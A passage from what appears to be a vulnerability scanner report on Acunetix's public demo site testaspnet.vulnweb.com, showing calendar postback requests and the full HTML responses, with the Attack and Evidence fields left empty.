advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8303&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAvuOIntoIZGRk1bidnuY0xLWUStPH30CaY5r90o0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLx7JTfBALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJBPhdVWKpA0VyRtwDRsJI9zK%2B9fg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:27 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAvuOIntoIZGRk1bidnuY0xLWUStPH30CaY5r90o0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLx7JTfBALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJBPhdVWKpA0VyRtwDRsJI9zK+9fg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:White" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8195&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAIf%2BqSdoIZGRkHwBEMdMLyZdfPgna4hUWuz5IvgM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLXn%2Fz5CAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2F%2Fjk7vEF7HAvnc6cgh2rgB7%2FAxPA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:26 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAIf+qSdoIZGRkHwBEMdMLyZdfPgna4hUWuz5IvgM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLXn/z5CAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w//jk7vEF7HAvnc6cgh2rgB7/AxPA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:White" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
